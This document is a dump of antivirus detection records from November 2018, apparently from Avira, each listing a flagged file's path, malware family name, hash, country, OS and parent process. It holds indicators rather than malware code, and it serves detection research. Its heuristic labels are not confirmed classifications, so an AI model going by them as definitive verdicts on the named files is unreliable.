  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='piqs.exe', filepath='G:\\PIQS.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='bf26f12bc2bb29dc980e84e5c6fe877f0c00de72d7eec2d4070c639bbdad8ee5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2065960, timestamp='2018-11-04T20:26:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='image11412.jpg', filepath='C:\\Users\\X\\Pictures\\image11412.JPG', filesize=19456000, name='DR/FakePic.Gen.#M1.#R1'), hash='4d7732d3c2a2bd9f02ce68c0960bf5f3c154e62766976bf4fc9bf0638cb91efb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195626-91454562', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-195626-91454562', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:59:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154238-7454288f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-154238-7454288F', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tabel-kalori-makanan-dan-minuman-pdf-23_6d8e61c.exe', filepath='G:\\tabel-kalori-makanan-dan-minuman-pdf-23_6d8e61c.exe', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='ffe1fd31cbbf2f44c40d7a8eb82b697be944da01c471b947c8a5fcf0f4e4bd8e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2114936, timestamp='2018-11-02T00:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a12e6202d3f845ccb75506dd221708ba02df20de86bbdb03824bebba4c8e1f82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\A12E6202D3F845CCB75506DD221708BA02DF20DE86BBDB03824BEBBA4C8E1F82', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a12e6202d3f845ccb75506dd221708ba02df20de86bbdb03824bebba4c8e1f82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fscapture.exe', filepath='D:\\chengxu\\FSCapture\\FSCapture.exe', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245072, timestamp='2018-11-02T12:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000707f', filepath='C:\\Windows\\Temp\\66805501-99d8-4ef3-9881-3f14b6efaf1e\\tmp00000340\\tmp0000707f', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='b7735db29861dd5fe01302ae94a0fa51e23846a6a97e67f92cd3ede4863a771c', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.876.11542\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-02T10:27:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uzzjuabc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UZZJuABC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103838-4bf1f1e3', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-103819-48058CDA\\AVSCAN-20181102-103838-4BF1F1E3', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='a94dd49899cbfffc72023ac58e7f415a8394ec2f2f5f10db27915631c2c5a7c5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221522-5e23f410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221522-5E23F410', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:15:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='F:\\HBCD\\Programs\\CardRecovery.exe', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160833-49189bbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_53363b79\\AVSCAN-20181102-160437-1FADCA07\\AVSCAN-20181102-160833-49189BBC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9de49d033715d614b112839ff4b9628c8d2ff63c3ba6437d44da61bd5513dd29', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T22:29:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='E:\\HBCD\\Programs\\DigitalRescue4Premium.exe', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dhl shipment.exe', filepath='DHL SHIPMENT.exe', filesize=584000, name='TR/Dropper.VB.b73de8.#M1.#R1'), hash='b73de8b732af32fb43df6569998f4a9b0ee2c681356b0858dffe2f4c5f05ad9c', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T01:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221038-b501aeea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_807db920\\AVSCAN-20181102-220730-8A0EEA5C\\AVSCAN-20181102-221038-B501AEEA', filesize=128000, name='Adware/Elex.b8260f.#M1.#R1'), hash='b8260f16843f6057b1d5f9063bb28ea94360c2dd26eb528882c559532d4f37ba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:10:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221504-5b5bf7e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221504-5B5BF7E4', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133219-275a8071', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c2998c4b\\AVSCAN-20181102-132709-0A87E09C\\AVSCAN-20181102-133219-275A8071', filesize=192000, name='TR/Dropper.Gen7.#M300.#R600206'), hash='93080fc898ca14662457505a13ccb04bc06305e77f36c56fb1141f1a7891e339', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E71059717CA4CC753171E672E9CAD09F48398F8F71A4F5142A481B829659AF9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081658-483b4de0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081658-483B4DE0', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mappe concettuali.exe', filepath='\\\\ts-xelcea\\share\\ROBERTO\\Roberto\\programmi\\mappe concettuali.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='9d5474ab118826102c3fcb29558ce07cda47e87bd27d0f3ecbeda8f171b07faa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='logo.exe', filepath='F:\\logo\\logo.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:29:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\hecxk2msaee\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T06:13:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T11:43:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FB953C7C09762CF0F87505902FB0F65D8508CE8ED30D12CEA90168EBB4A80A9A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:07:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141256-6a5d50c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-141256-6A5D50C9', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140304-f8e3bc44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140304-F8E3BC44', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:03:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='гришанова эх, девочки.exe', filepath='C:\\Documents and Settings\\X\\Рабочий стол\\Гришанова Эх, девочки.exe', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c01494cfee8fb222b05b7269f85a0008d16c893f6e63ae84ba3de83f4aa9f3c0', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290eb3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290eb3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:43:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184943-d7a4a427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184943-D7A4A427', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:49:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290910', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290910', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zoo.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Games\\Zoo Tycoon\\zoo.exe', filesize=2560000, name='W32/Expiro.N.#M1.#R1'), hash='da0c950715f7d324c4017287b006d30d1739fe6e54a6243266f93c02c31e440d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ad56', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ad56', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:06:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl11c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl11C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-04T15:33:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.exe', filepath='C:\\Users\\X\\Desktop\\Alles\\GTA\\client\\launcher.exe', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:i\\\\\\/gpXBSWJ0y4RWPS.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T23:08:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsa99D7.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T18:19:40Z'), dt=datetime.date(2018, 11, 4)),
